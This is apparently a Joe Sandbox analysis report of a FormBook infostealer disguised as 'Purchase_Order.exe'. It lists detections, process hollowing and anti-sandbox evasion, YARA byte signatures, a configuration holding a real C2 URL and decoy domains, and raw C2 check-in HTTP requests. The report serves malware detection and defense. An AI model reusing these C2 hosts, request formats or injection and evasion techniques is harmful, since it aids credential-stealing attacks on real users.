Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Purchase_Order.exe

Overview

General Information

Sample Name:Purchase_Order.exe
Analysis ID:433266
MD5:4aa8159742becd97f9ecdda33798b065
SHA1:775aee28c33102de8c4bdd45dd09821b717b8678
SHA256:65c6621762bb1bb1589a4a58d4ab2d3fa7c02e581b217b86ed2ff51227d7565b
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase_Order.exe (PID: 1528 cmdline: 'C:\Users\user\Desktop\Purchase_Order.exe' MD5: 4AA8159742BECD97F9ECDDA33798B065)
    • RegSvcs.exe (PID: 3608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 1752 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 1200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.culturalinterface.net/uqf5/"], "decoy": ["paolograssino.com", "hammockcoastproperty.net", "blinbins.com", "financierapoorvenirsas.com", "mattruddle.com", "wighumanhair.com", "tvdajiang14.com", "theblackharvest.com", "tylerrucarean.com", "a-prime-india-demataccount.zone", "amboselisafarigallery.info", "toolbnbapp.com", "scientificindustrial.com", "trainup-wall.com", "pocosmo.com", "thebluepottingtable.com", "leavelogs.com", "verbalfreedom.com", "qa4i.com", "kiiikoo.com", "glossedbythebrat.com", "gorditasdemaiz.com", "healthystartswithin.com", "homeanddesignstudio.com", "skalewide.com", "bestdispatchtowitnesstoday.info", "cineconhisense.com", "mahibhardwaj.com", "imperatrizacam.com", "bezoekburen.com", "qbakan.com", "ansalapishagunrealestate.com", "crow94723.com", "kosova.one", "chhhju.com", "cominghomestead.com", "ingenious.care", "unclesamsoftware.com", "xn--cfe12fhb.com", "tradinglantern.com", "wwwthedrudgereport.com", "researchinnovations.net", "to-cs.com", "sandia.info", "tachibana-fukushima.com", "pzzfw.com", "flockuplabs.com", "stays.travel", "itertempora.net", "murrietayoga.com", "plus5tocrafting.com", "ovidrelprefilledsyringe.com", "prltoday.com", "l24consultants.net", "mexicobeachselfstorage.com", "bnvjufj.icu", "schulze.media", "thewinebarrel.info", "blesst.tech", "newtec.life", "acmarketinghacks.com", "elitevillaholidays.com", "pr-daily.com", "cgjanvier.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xb44d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xb486a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xdb8f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xdbc8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc057d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xe799d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xc0069:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xe7489:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xc067f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xe7a9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xc07f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xe7c17:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xb5282:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xdc6a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xbf2e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xe6704:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb5ffa:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xdd41a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xc566f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xeca8f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xc6712:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0xc25a1:$sqlite3step: 68 34 1C 7B E1
      • 0xc26b4:$sqlite3step: 68 34 1C 7B E1
      • 0xe99c1:$sqlite3step: 68 34 1C 7B E1
      • 0xe9ad4:$sqlite3step: 68 34 1C 7B E1
      • 0xc25d0:$sqlite3text: 68 38 2A 90 C5
      • 0xc26f5:$sqlite3text: 68 38 2A 90 C5
      • 0xe99f0:$sqlite3text: 68 38 2A 90 C5
      • 0xe9b15:$sqlite3text: 68 38 2A 90 C5
      • 0xc25e3:$sqlite3blob: 68 53 D8 7F 8C
      • 0xc270b:$sqlite3blob: 68 53 D8 7F 8C
      • 0xe9a03:$sqlite3blob: 68 53 D8 7F 8C
      • 0xe9b2b:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 21 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158b9:$sqlite3step: 68 34 1C 7B E1
          • 0x159cc:$sqlite3step: 68 34 1C 7B E1
          • 0x158e8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
          • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
          4.0.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.0.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 7 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious Process Start Without DLLShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase_Order.exe' , ParentImage: C:\Users\user\Desktop\Purchase_Order.exe, ParentProcessId: 1528, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 3608
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase_Order.exe' , ParentImage: C:\Users\user\Desktop\Purchase_Order.exe, ParentProcessId: 1528, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 3608

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.culturalinterface.net/uqf5/"], "decoy": ["paolograssino.com", "hammockcoastproperty.net", "blinbins.com", "financierapoorvenirsas.com", "mattruddle.com", "wighumanhair.com", "tvdajiang14.com", "theblackharvest.com", "tylerrucarean.com", "a-prime-india-demataccount.zone", "amboselisafarigallery.info", "toolbnbapp.com", "scientificindustrial.com", "trainup-wall.com", "pocosmo.com", "thebluepottingtable.com", "leavelogs.com", "verbalfreedom.com", "qa4i.com", "kiiikoo.com", "glossedbythebrat.com", "gorditasdemaiz.com", "healthystartswithin.com", "homeanddesignstudio.com", "skalewide.com", "bestdispatchtowitnesstoday.info", "cineconhisense.com", "mahibhardwaj.com", "imperatrizacam.com", "bezoekburen.com", "qbakan.com", "ansalapishagunrealestate.com", "crow94723.com", "kosova.one", "chhhju.com", "cominghomestead.com", "ingenious.care", "unclesamsoftware.com", "xn--cfe12fhb.com", "tradinglantern.com", "wwwthedrudgereport.com", "researchinnovations.net", "to-cs.com", "sandia.info", "tachibana-fukushima.com", "pzzfw.com", "flockuplabs.com", "stays.travel", "itertempora.net", "murrietayoga.com", "plus5tocrafting.com", "ovidrelprefilledsyringe.com", "prltoday.com", "l24consultants.net", "mexicobeachselfstorage.com", "bnvjufj.icu", "schulze.media", "thewinebarrel.info", "blesst.tech", "newtec.life", "acmarketinghacks.com", "elitevillaholidays.com", "pr-daily.com", "cgjanvier.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Purchase_Order.exeVirustotal: Detection: 20%Perma Link
            Source: Purchase_Order.exeReversingLabs: Detection: 15%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 4.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Purchase_Order.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Purchase_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
            Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
            Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.culturalinterface.net/uqf5/
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1Host: www.prltoday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1Host: www.gorditasdemaiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1Host: www.mexicobeachselfstorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1Host: www.tylerrucarean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1Host: www.cgjanvier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1Host: www.flockuplabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1Host: www.culturalinterface.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1Host: www.toolbnbapp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1Host: www.trainup-wall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1Host: www.paolograssino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1Host: www.a-prime-india-demataccount.zoneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
            Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1Host: www.prltoday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1Host: www.gorditasdemaiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1Host: www.mexicobeachselfstorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1Host: www.tylerrucarean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1Host: www.cgjanvier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1Host: www.flockuplabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1Host: www.culturalinterface.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1Host: www.toolbnbapp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1Host: www.trainup-wall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1Host: www.paolograssino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1Host: www.a-prime-india-demataccount.zoneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.prltoday.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Jun 2021 13:02:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: Purchase_Order.exe, 00000000.00000003.241548215.00000000061F2000.00000004.00000001.sdmpString found in binary or memory: http://en.w
